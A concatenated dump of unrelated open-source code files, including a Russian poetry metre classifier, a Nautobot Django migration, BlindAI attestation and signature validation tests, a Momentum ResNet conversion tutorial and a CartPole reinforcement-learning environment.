adds a context variables: * name -- Slug of selected menu. """ pk = None if "menu_id" in context: # NOTE: Here, "context" is not a simple dict instance, so we can't use: # # >> pk = context.pop("menu_id", None) # pk = context.get('menu_id') del context['menu_id'] if pk: menu = Menu.objects.get(pk=pk) context["name"] = menu.slug return context def bookmarks_menu(context): """Bookmarks plugget. Shows all your bookmarks. """ if 'user' in context: context['menu_id'] = get_bookmarks_for(context['user'].username).pk return menu(context) registry.register_simple_plugget_source(_("Text plugget"), _("Simply renders a text paragraph."), form=TextPluggetForm)
tests/contrib/test_cached_dataset.py
mmathys/bagua
635
61948
from bagua.torch_api.contrib.cached_dataset import CachedDataset from torch.utils.data.dataset import Dataset import numpy as np import logging import unittest from tests import skip_if_cuda_available logging.basicConfig(level=logging.DEBUG) class MyDataset(Dataset): def __init__(self, size): self.size = size self.dataset = [(np.random.rand(5, 2), np.random.rand(1)) for _ in range(size)] def __getitem__(self, item): return self.dataset[item] def __len__(self): return self.size class TestCacheDataset(unittest.TestCase): def check_dataset(self, dataset, cache_dataset): for _ in range(10): for _, _ in enumerate(cache_dataset): pass for i in range(len(dataset)): self.assertTrue((dataset[i][0] == cache_dataset[i][0]).all()) self.assertTrue((dataset[i][1] == cache_dataset[i][1]).all()) @skip_if_cuda_available() def test_redis(self): dataset1 = MyDataset(102) dataset2 = MyDataset(102) cache_dataset1 = CachedDataset( dataset1, backend="redis", dataset_name="d1", ) cache_dataset2 = CachedDataset( dataset2, backend="redis", dataset_name="d2", ) cache_dataset1.cache_loader.store.clear() self.check_dataset(dataset1, cache_dataset1) self.assertEqual(cache_dataset1.cache_loader.num_keys(), len(dataset1)) self.check_dataset(dataset2, cache_dataset2) self.assertEqual( cache_dataset2.cache_loader.num_keys(), len(dataset1) + len(dataset2) ) if __name__ == "__main__": unittest.main()
rupo/metre/metre_classifier.py
dagrigorev/rupo
171
61954
<filename>rupo/metre/metre_classifier.py # -*- coding: utf-8 -*- # Автор: <NAME> # Описание: Классификатор метра. from collections import OrderedDict from typing import List, Dict, Tuple import jsonpickle import logging from rupo.main.markup import Line, Markup from rupo.util.mixins import CommonMixin from rupo.metre.pattern_analyzer import PatternAnalyzer from rupo.util.preprocess import get_first_vowel_position from rupo.util.timeit import timeit class StressCorrection(CommonMixin): """ Исправление ударения. """ def __init__(self, line_number: int, word_number: int, syllable_number: int, word_text: str, stress: int) -> None: """ :param line_number: номер строки. :param word_number: номер слова. :param syllable_number: номер слога. :param word_text: текст слова. :param stress: позиция ударения (с 0). """ self.line_number = line_number self.word_number = word_number self.syllable_number = syllable_number self.word_text = word_text self.stress = stress class ClassificationResult(CommonMixin): """ Результат классификации стихотворения по метру. """ def __init__(self, count_lines: int=0) -> None: """ :param count_lines: количество строк. """ self.metre = None self.count_lines = count_lines self.errors_count = {k: 0 for k in MetreClassifier.metres.keys()} # type: Dict[str, int] self.corrections = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]] self.resolutions = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]] self.additions = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]] def get_metre_errors_count(self): """ :return: получить количество ошибок на заданном метре. """ return self.errors_count[self.metre] def to_json(self): """ :return: сериализация в json. """ return jsonpickle.encode(self) @staticmethod def str_corrections(collection: List[StressCorrection]) -> str: """ :param collection: список исправлений. :return: его строковое представление. """ return"\n".join([str((item.word_text, item.syllable_number)) for item in collection]) def __str__(self): st = "Метр: " + str(self.metre) + "\n" st += "Снятая омография: \n" + ClassificationResult.str_corrections(self.resolutions[self.metre]) + "\n" st += "Неправильные ударения: \n" + ClassificationResult.str_corrections(self.corrections[self.metre]) + "\n" st += "Новые ударения: \n" + ClassificationResult.str_corrections(self.additions[self.metre]) + "\n" return st class ErrorsTableRecord: def __init__(self, strong_errors, weak_errors, pattern, failed=False): self.strong_errors = strong_errors self.weak_errors = weak_errors self.pattern = pattern self.failed = failed def __str__(self): return self.pattern + " " + str(self.strong_errors) + " " + str(self.weak_errors) def __repr__(self): return self.__str__() class ErrorsTable: def __init__(self, num_lines): self.data = {} self.num_lines = num_lines self.coef = OrderedDict( [("iambos", 0.3), ("choreios", 0.3), ("daktylos", 0.4), ("amphibrachys", 0.4), ("anapaistos", 0.4), ("dolnik3", 0.5), ("dolnik2", 0.5), ("taktovik3", 6.0), ("taktovik2", 6.0) ]) self.sum_coef = OrderedDict( [("iambos", 0.0), ("choreios", 0.0), ("daktylos", 0.0), ("amphibrachys", 0.0), ("anapaistos", 0.0), ("dolnik3", 0.035), ("dolnik2", 0.035), ("taktovik3", 0.10), ("taktovik2", 0.10) ]) for metre_name in MetreClassifier.metres.keys(): self.data[metre_name] = [ErrorsTableRecord(0, 0, "") for _ in range(num_lines)] def add_record(self, metre_name, line_num, strong_errors, weak_errors, pattern, failed=False): self.data[metre_name][line_num] = ErrorsTableRecord(strong_errors, weak_errors, pattern, failed) def get_best_metre(self): for l in range(self.num_lines): strong_sum = 0 weak_sum = 0 for metre_name in self.data.keys(): strong_sum += self.data[metre_name][l].strong_errors weak_sum += self.data[metre_name][l].weak_errors for metre_name, column in self.data.items(): if strong_sum != 0: column[l].strong_errors = column[l].strong_errors / float(strong_sum) if weak_sum != 0: column[l].weak_errors = column[l].weak_errors / float(weak_sum) sums = dict() for metre_name in self.data.keys(): sums[metre_name] = (0, 0) for metre_name, column in self.data.items(): strong_sum = 0 weak_sum = 0 for l in range(self.num_lines): strong_sum += column[l].strong_errors weak_sum += column[l].weak_errors sums[metre_name] = (strong_sum, weak_sum) for metre_name, pair in sums.items(): sums[metre_name] = self.sum_coef[metre_name] + (pair[0] + pair[1] / 2.0) * self.coef[metre_name] / self.num_lines logging.debug(sums) return min(sums, key=sums.get) class MetreClassifier(object): """ Классификатор, считает отклонения от стандартных шаблонов ритма(метров). """ metres = OrderedDict( [("iambos", '(us)*(uS)(U)?(U)?'), ("choreios", '(su)*(S)(U)?(U)?'), ("daktylos", '(suu)*(S)(U)?(U)?'), ("amphibrachys", '(usu)*(uS)(U)?(U)?'), ("anapaistos", '(uus)*(uuS)(U)?(U)?'), ("dolnik3", '(u)?(u)?((su)(u)?)*(S)(U)?(U)?'), ("dolnik2", '(u)?(u)?((s)(u)?)*(S)(U)?(U)?'), ("taktovik3", '(u)?(u)?((su)(u)?(u)?)*(S)(U)?(U)?'), ("taktovik2", '(u)?(u)?((s)(u)?(u)?)*(S)(U)?(U)?') ]) border_syllables_count = 20 @staticmethod @timeit def classify_metre(markup): """ Классифицируем стихотворный метр. :param markup: разметка. :return: результат классификации. """ result = ClassificationResult(len(markup.lines)) num_lines = len(markup.lines) errors_table = ErrorsTable(num_lines) for l, line in enumerate(markup.lines): for metre_name, metre_pattern in MetreClassifier.metres.items(): line_syllables_count = sum([len(word.syllables) for word in line.words]) # Строчки длиной больше border_syllables_count слогов не обрабатываем. if line_syllables_count > MetreClassifier.border_syllables_count or line_syllables_count == 0: continue error_border = 7 if metre_name == "dolnik2" or metre_name == "dolnik3": error_border = 3 if metre_name == "taktovik2" or metre_name == "taktovik3": error_border = 2 pattern, strong_errors, weak_errors, analysis_errored = \ PatternAnalyzer.count_errors(MetreClassifier.metres[metre_name], MetreClassifier.__get_line_pattern(line), error_border) if analysis_errored or len(pattern) == 0: errors_table.add_record(metre_name, l, strong_errors, weak_errors, pattern, True) continue corrections = MetreClassifier.__get_line_pattern_matching_corrections(line, l, pattern)[0] accentuation_errors = len(corrections) strong_errors += accentuation_errors errors_table.add_record(metre_name, l, strong_errors, weak_errors, pattern) result.metre = errors_table.get_best_metre() # Запомним все исправления. for l, line in enumerate(markup.lines): pattern = errors_table.data[result.metre][l].pattern failed = errors_table.data[result.metre][l].failed if failed or len(pattern) == 0: continue corrections, resolutions, additions =\ MetreClassifier.__get_line_pattern_matching_corrections(line, l, pattern) result.corrections[result.metre] += corrections result.resolutions[result.metre] += resolutions result.additions[result.metre] += additions result.errors_count[result.metre] += len(corrections) return result @staticmethod def __get_line_pattern(line: Line) -> str: """ Сопоставляем строку шаблону, считаем ошибки. :param line: строка. :return: количество ошибок """ pattern = "" for w, word in enumerate(line.words): if len(word.syllables) == 0: pattern += "U" else: for syllable in word.syllables: if syllable.stress != -1: pattern += "S" else: pattern += "U" return pattern @staticmethod def __get_line_pattern_matching_corrections(line: Line, line_number: int, pattern: str) \ -> Tuple[List[StressCorrection], List[StressCorrection], List[StressCorrection]]: """ Ударения могут приходиться на слабое место, если безударный слог того же слова не попадает на икт. Иначе - ошибка. :param line: строка. :param line_number: номер строки. :param pattern: шаблон. :return: ошибки, дополнения и снятия """ corrections = [] resolutions = [] additions = [] number_in_pattern = 0 for w, word in enumerate(line.words): # Игнорируем слова длиной меньше 2 слогов. if len(word.syllables) == 0: continue if len(word.syllables) == 1: if pattern[number_in_pattern].lower() == "s" and word.syllables[0].stress == -1: additions.append(StressCorrection(line_number, w, 0, word.text, word.syllables[0].vowel())) number_in_pattern += len(word.syllables) continue stress_count = word.count_stresses() for syllable in word.syllables: if stress_count == 0 and pattern[number_in_pattern].lower() == "s": # Ударений нет, ставим такое, какое подходит по метру. Возможно несколько. additions.append(StressCorrection(line_number, w, syllable.number, word.text, syllable.vowel())) elif pattern[number_in_pattern].lower() == "u" and syllable.stress != -1: # Ударение есть и оно падает на этот слог, при этом в шаблоне безударная позиция. # Найдём такой слог, у которого в шаблоне ударная позиция. Это и есть наше исправление. for other_syllable in word.syllables: other_number_in_pattern = other_syllable.number - syllable.number + number_in_pattern if syllable.number == other_syllable.number or pattern[other_number_in_pattern].lower() != "s": continue ac = StressCorrection(line_number, w, other_syllable.number, word.text, other_syllable.vowel()) if stress_count == 1 and other_syllable.stress == -1: corrections.append(ac) else: resolutions.append(ac) number_in_pattern += 1 return corrections, resolutions, additions @staticmethod def get_improved_markup(markup: Markup, result: ClassificationResult) -> Markup: """ Улучшаем разметку после классификации метра. :param markup: начальная разметка. :param result: результат классификации. :return: улучшенная разметка. """ for pos in result.corrections[result.metre] + result.resolutions[result.metre]: syllables = markup.lines[pos.line_number].words[pos.word_number].syllables for i, syllable in enumerate(syllables): syllable.stress = -1 if syllable.number == pos.syllable_number: syllable.stress = syllable.begin + get_first_vowel_position(syllable.text) for pos in result.additions[result.metre]: syllable = markup.lines[pos.line_number].words[pos.word_number].syllables[pos.syllable_number] syllable.stress = syllable.begin + get_first_vowel_position(syllable.text) return markup @staticmethod def improve_markup(markup: Markup) -> \ Tuple[Markup, ClassificationResult]: """ Улучшение разметки метрическим классификатором. :param markup: начальная разметка. """ result = MetreClassifier.classify_metre(markup) improved_markup = MetreClassifier.get_improved_markup(markup, result) return improved_markup, result
nautobot/dcim/migrations/0003_initial_part_3.py
psmware-ltd/nautobot
384
61966
# Generated by Django 3.1.7 on 2021-04-01 06:35 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import mptt.fields import nautobot.extras.models.statuses import taggit.managers class Migration(migrations.Migration): initial = True dependencies = [ ("contenttypes", "0002_remove_content_type_name"), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ("tenancy", "0001_initial"), ("extras", "0001_initial_part_1"), ("dcim", "0002_initial_part_2"), ("ipam", "0001_initial_part_1"), ] operations = [ migrations.AddField( model_name="rackreservation", name="user", field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name="rackgroup", name="parent", field=mptt.fields.TreeForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name="children", to="dcim.rackgroup", ), ), migrations.AddField( model_name="rackgroup", name="site", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="rack_groups", to="dcim.site" ), ), migrations.AddField( model_name="rack", name="group", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="racks", to="dcim.rackgroup", ), ), migrations.AddField( model_name="rack", name="role", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name="racks", to="dcim.rackrole", ), ), migrations.AddField( model_name="rack", name="site", field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name="racks", to="dcim.site"), ), migrations.AddField( model_name="rack", name="status", field=nautobot.extras.models.statuses.StatusField( null=True, on_delete=django.db.models.deletion.PROTECT, related_name="dcim_rack_related", to="extras.status", ), ), migrations.AddField( model_name="rack", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="rack", name="tenant", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name="racks", to="tenancy.tenant", ), ), migrations.AddField( model_name="powerporttemplate", name="device_type", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="powerporttemplates", to="dcim.devicetype" ), ), migrations.AddField( model_name="powerport", name="_cable_peer_type", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="contenttypes.contenttype", ), ), migrations.AddField( model_name="powerport", name="_path", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath" ), ), migrations.AddField( model_name="powerport", name="cable", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable" ), ), migrations.AddField( model_name="powerport", name="device", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="powerports", to="dcim.device" ), ), migrations.AddField( model_name="powerport", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="powerpanel", name="rack_group", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to="dcim.rackgroup" ), ), migrations.AddField( model_name="powerpanel", name="site", field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to="dcim.site"), ), migrations.AddField( model_name="powerpanel", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="poweroutlettemplate", name="device_type", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="poweroutlettemplates", to="dcim.devicetype" ), ), migrations.AddField( model_name="poweroutlettemplate", name="power_port", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="poweroutlet_templates", to="dcim.powerporttemplate", ), ), migrations.AddField( model_name="poweroutlet", name="_cable_peer_type", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="contenttypes.contenttype", ), ), migrations.AddField( model_name="poweroutlet", name="_path", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath" ), ), migrations.AddField( model_name="poweroutlet", name="cable", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable" ), ), migrations.AddField( model_name="poweroutlet", name="device", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="poweroutlets", to="dcim.device" ), ), migrations.AddField( model_name="poweroutlet", name="power_port", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="poweroutlets", to="dcim.powerport", ), ), migrations.AddField( model_name="poweroutlet", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="powerfeed", name="_cable_peer_type", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="contenttypes.contenttype", ), ), migrations.AddField( model_name="powerfeed", name="_path", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath" ), ), migrations.AddField( model_name="powerfeed", name="cable", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable" ), ), migrations.AddField( model_name="powerfeed", name="power_panel", field=models.ForeignKey( on_delete=django.db.models.deletion.PROTECT, related_name="powerfeeds", to="dcim.powerpanel" ), ), migrations.AddField( model_name="powerfeed", name="rack", field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to="dcim.rack"), ), migrations.AddField( model_name="powerfeed", name="status", field=nautobot.extras.models.statuses.StatusField( null=True, on_delete=django.db.models.deletion.PROTECT, related_name="dcim_powerfeed_related", to="extras.status", ), ), migrations.AddField( model_name="powerfeed", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="platform", name="manufacturer", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name="platforms", to="dcim.manufacturer", ), ), migrations.AddField( model_name="inventoryitem", name="device", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="inventoryitems", to="dcim.device" ), ), migrations.AddField( model_name="inventoryitem", name="manufacturer", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name="inventory_items", to="dcim.manufacturer", ), ), migrations.AddField( model_name="inventoryitem", name="parent", field=mptt.fields.TreeForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name="child_items", to="dcim.inventoryitem", ), ), migrations.AddField( model_name="inventoryitem", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="interfacetemplate", name="device_type", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="interfacetemplates", to="dcim.devicetype" ), ), migrations.AddField( model_name="interface", name="_cable_peer_type", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="contenttypes.contenttype", ), ), migrations.AddField( model_name="interface", name="_path", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath" ), ), migrations.AddField( model_name="interface", name="cable", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable" ), ), migrations.AddField( model_name="interface", name="device", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="interfaces", to="dcim.device" ), ), migrations.AddField( model_name="interface", name="lag", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="member_interfaces", to="dcim.interface", ), ), migrations.AddField( model_name="interface", name="tagged_vlans", field=models.ManyToManyField(blank=True, related_name="interfaces_as_tagged", to="ipam.VLAN"), ), migrations.AddField( model_name="interface", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="interface", name="untagged_vlan", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="interfaces_as_untagged", to="ipam.vlan", ), ), migrations.AddField( model_name="frontporttemplate", name="device_type", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="frontporttemplates", to="dcim.devicetype" ), ), migrations.AddField( model_name="frontporttemplate", name="rear_port", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="frontport_templates", to="dcim.rearporttemplate", ), ), migrations.AddField( model_name="frontport", name="_cable_peer_type", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="contenttypes.contenttype", ), ), migrations.AddField( model_name="frontport", name="cable", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable" ), ), migrations.AddField( model_name="frontport", name="device", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="frontports", to="dcim.device" ), ), migrations.AddField( model_name="frontport", name="rear_port", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="frontports", to="dcim.rearport" ), ), migrations.AddField( model_name="frontport", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="devicetype", name="manufacturer", field=models.ForeignKey( on_delete=django.db.models.deletion.PROTECT, related_name="device_types", to="dcim.manufacturer" ), ), migrations.AddField( model_name="devicetype", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), migrations.AddField( model_name="devicebaytemplate", name="device_type", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="devicebaytemplates", to="dcim.devicetype" ), ), migrations.AddField( model_name="devicebay", name="device", field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="devicebays", to="dcim.device" ), ), migrations.AddField( model_name="devicebay", name="installed_device", field=models.OneToOneField( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="parent_bay", to="dcim.device", ), ), migrations.AddField( model_name="devicebay", name="tags", field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"), ), ]
client/tests/test_proof.py
mithril-security/blindai
121
62033
from copy import deepcopy from hashlib import sha256 import os import unittest from google.protobuf.timestamp_pb2 import Timestamp from blindai.pb.securedexchange_pb2 import ( Payload, ) from blindai.client import ( RunModelResponse, UploadModelResponse, ) from blindai.dcap_attestation import Policy from blindai.utils.errors import SignatureError, AttestationError from .covidnet import get_input, get_model exec_run = os.path.join(os.path.dirname(__file__), "exec_run.proof") exec_upload = os.path.join(os.path.dirname(__file__), "exec_upload.proof") tmp_path = os.path.join(os.path.dirname(__file__), "tmp_exec.proof") policy_file = os.path.join(os.path.dirname(__file__), "policy.toml") class TestProof(unittest.TestCase): def test_parse_run(self): response = RunModelResponse() response.load_from_file(exec_run) self.assertTrue(response.is_signed()) response2 = RunModelResponse() with open(exec_run, "rb") as file: response2.load_from_bytes(file.read()) self.assertEqual(response.payload, response2.payload) self.assertEqual(response.signature, response2.signature) self.assertEqual(response.attestation, response2.attestation) self.assertEqual(response.output, response2.output) response3 = RunModelResponse() response3.load_from_bytes(response.as_bytes()) self.assertEqual(response.payload, response3.payload) self.assertEqual(response.signature, response3.signature) self.assertEqual(response.attestation, response3.attestation) self.assertEqual(response.output, response3.output) response3.save_to_file(tmp_path) response4 = RunModelResponse() response4.load_from_file(tmp_path) self.assertEqual(response.payload, response4.payload) self.assertEqual(response.signature, response4.signature) self.assertEqual(response.attestation, response4.attestation) self.assertEqual(response.output, response4.output) def test_parse_upload(self): response = UploadModelResponse() response.load_from_file(exec_upload) self.assertTrue(response.is_signed()) response2 = UploadModelResponse() with open(exec_upload, "rb") as file: response2.load_from_bytes(file.read()) self.assertEqual(response.payload, response2.payload) self.assertEqual(response.signature, response2.signature) self.assertEqual(response.attestation, response2.attestation) response3 = UploadModelResponse() response3.load_from_bytes(response.as_bytes()) self.assertEqual(response.payload, response3.payload) self.assertEqual(response.signature, response3.signature) self.assertEqual(response.attestation, response3.attestation) response3.save_to_file(tmp_path) response4 = UploadModelResponse() response4.load_from_file(tmp_path) self.assertEqual(response.payload, response4.payload) self.assertEqual(response.signature, response4.signature) self.assertEqual(response.attestation, response4.attestation) def test_validate_run(self): response = RunModelResponse() response.load_from_file(exec_run) policy = Policy.from_file(policy_file) response.validate( get_input(), policy=policy, ) # Not signed response2 = deepcopy(response) response2.signature = None response2.attestation = None with self.assertRaises(SignatureError): response2.validate( get_input(), policy=policy, ) # Quote validation response2 = deepcopy(response) response2.attestation.quote += b"a" with self.assertRaises(AttestationError): response2.validate( get_input(), policy=policy, ) response2 = deepcopy(response) response2.attestation.enclave_held_data += b"a" with self.assertRaises(AttestationError): response2.validate( get_input(), policy=policy, ) # Payload validation response2 = deepcopy(response) payload = Payload.FromString(response2.payload) payload.run_model_payload.output[0] += 0.1 response2.payload = payload.SerializeToString() with self.assertRaises(SignatureError): response2.validate( get_input(), policy=policy, ) # Input validation response2 = deepcopy(response) data = deepcopy(get_input()) data[4] += 1 with self.assertRaises(SignatureError): response2.validate( data, policy=policy, ) # Using file response.validate( get_input(), policy_file=policy_file, ) def test_validate_upload(self): response = UploadModelResponse() response.load_from_file(exec_upload) policy = Policy.from_file(policy_file) model_hash = sha256(get_model()).digest() response.validate( model_hash, policy=policy, ) # Not signed response2 = deepcopy(response) response2.signature = None response2.attestation = None with self.assertRaises(SignatureError): response2.validate( model_hash, policy=policy, ) # Quote validation response2 = deepcopy(response) response2.attestation.quote += b"a" with self.assertRaises(AttestationError): response2.validate( model_hash, policy=policy, ) response2 = deepcopy(response) response2.attestation.enclave_held_data += b"a" with self.assertRaises(AttestationError): response2.validate( model_hash, policy=policy, ) # Payload validation response2 = deepcopy(response) payload = Payload.FromString(response2.payload) payload.send_model_payload.model_hash = ( b"1" + payload.send_model_payload.model_hash[1:] ) response2.payload = payload.SerializeToString() with self.assertRaises(SignatureError): response2.validate( model_hash, policy=policy, ) # Input validation response2 = deepcopy(response) new_hash = model_hash[:5] + b"1" + model_hash[6:] with self.assertRaises(SignatureError): response2.validate( new_hash, policy=policy, ) # Using file response.validate( model_hash, policy_file=policy_file, )
problems/first-non-repeated-character/first-non-repeated-character-answer.py
lhayhurst/interview-with-python
201
62114
##$$## ---------- TAGS ----------- ##$$## ##$$## first,non,repeated,character ##$$## --------- ENDTAGS --------- ##$$## ###### - Write your answer below - ######
momentumnet-main/examples/drop_in_replacement_tutorial.py
ZhuFanCheng/Thesis
188
62118
<reponame>ZhuFanCheng/Thesis """ ====================================================== From ResNets to Momentum ResNets 1) ====================================================== This is a tutorial to use the transform_to_momentumnet method: <NAME>, <NAME>, <NAME>, <NAME>. Momentum Residual Neural Networks. Proceedings of the 38th International Conference on Machine Learning, PMLR 139:9276-9287 """ # noqa # Authors: <NAME>, <NAME> # License: MIT from torch import nn from momentumnet import transform_to_momentumnet #################################### # Let us define a toy Neural Network #################################### class ResBlock(nn.Module): def __init__(self, functions): super(ResBlock, self).__init__() self.functions = functions def forward(self, x): for f in self.functions: x = x + f(x) return x class Net(nn.Module): def __init__(self): super(Net, self).__init__() self.res_layer1 = ResBlock( nn.Sequential( *[ nn.Sequential( nn.Linear(2, 10), nn.Tanh(), nn.Linear(10, 2) ) for _ in range(3) ] ) ) self.l1 = nn.Linear(2, 4) self.layer2 = nn.Sequential( *[ nn.Sequential(nn.Linear(4, 100), nn.ReLU(), nn.Linear(100, 4)) for _ in range(4) ] ) self.l2 = nn.Linear(4, 8) self.fc = nn.Linear(8, 10) def forward(self, x): out = self.res_layer1(x) # Residual out = self.l1(out) out = self.layer2(out) # Not Residual but same dimensions out = self.l2(out) out = self.fc(out) return out net = Net() ################################################### # We want to transform it into its Momentum version ################################################### ############################################################################### # The first layer 'res_layer1' preserves dimension and is residual. # It can be accessed through net.res_layer_1.functions so we will specify # this attribute as the "sub_layers" parameter. # One can transform this residual block into a momentum one as follow: mnet1 = transform_to_momentumnet( net, ["res_layer1.functions"], # attributes of the sublayers in net gamma=0.9, use_backprop=False, is_residual=True, keep_first_layer=False, ) ############################################################################### # Note that layer2 is not residual but also preserves dimensions. # It can be accessed through net.layer_2 so we will specify # this attribute as the "sub_layers" parameter. # One can transform it in the same way setting is_residual to False. mnet = transform_to_momentumnet( mnet1, ["layer2"], gamma=0.9, use_backprop=False, is_residual=False, keep_first_layer=False, ) ############################################################################### # net, mnet1, and mnet have the same parameters.
macarico/tasks/cartpole.py
bgalbraith/macarico
121
62193
<gh_stars>100-1000 """ Largely based on the OpenAI Gym Implementation https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py """ from __future__ import division, generators, print_function import numpy as np import macarico import math import torch import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable as Var class CartPoleEnv(macarico.Env): def __init__(self): macarico.Env.__init__(self, 2, 200) self.gravity = 9.8 self.masscart = 1.0 self.masspole = 0.1 self.total_mass = (self.masspole + self.masscart) self.length = 0.5 # actually half the pole's length self.polemass_length = (self.masspole * self.length) self.force_mag = 10.0 self.tau = 0.02 # seconds between state updates # Angle at which to fail the episode self.theta_threshold_radians = 12 * 2 * math.pi / 360 self.x_threshold = 2.4 # Angle limit set to 2 * theta_threshold_radians so failing observation # is still within bounds self.state = None # For macarico.Env self.actions = set(range(self.n_actions)) def _rewind(self): self.state = torch.rand(4) * 0.1 - 0.05 self.steps_beyond_done = None def _run_episode(self, policy): for _ in range(self.horizon()): a = policy(self) if self.step(a): break return self._trajectory def step(self, action): state = self.state x, x_dot, theta, theta_dot = state force = self.force_mag if action == 1 else - self.force_mag costheta = math.cos(theta) sintheta = math.sin(theta) temp = (force + self.polemass_length * theta_dot * theta_dot * sintheta) / self.total_mass thetaacc = (self.gravity * sintheta - costheta * temp) / (self.length * (4.0/3.0 - self.masspole * costheta * costheta / self.total_mass)) xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass x = x + self.tau * x_dot x_dot = x_dot + self.tau * xacc theta = theta + self.tau * theta_dot theta_dot = theta_dot + self.tau * thetaacc #self.state = (x, x_dot, theta, theta_dot) self.state[0] = x self.state[1] = x_dot self.state[2] = theta self.state[3] = theta_dot done = x < -self.x_threshold \ or x > self.x_threshold \ or theta < -self.theta_threshold_radians \ or theta > self.theta_threshold_radians return done class CartPoleLoss(macarico.Loss): def __init__(self): super(CartPoleLoss, self).__init__('-t') def evaluate(self, example): return -len(example.Yhat) #return (100 - state.t) / 100 class CartPoleFeatures(macarico.DynamicFeatures): def __init__(self): macarico.DynamicFeatures.__init__(self, 4) def _forward(self, state): return Var(state.state.view(1,1,-1), requires_grad=False)
tests/test_torchy.py
sagnik/baseline
241
62200
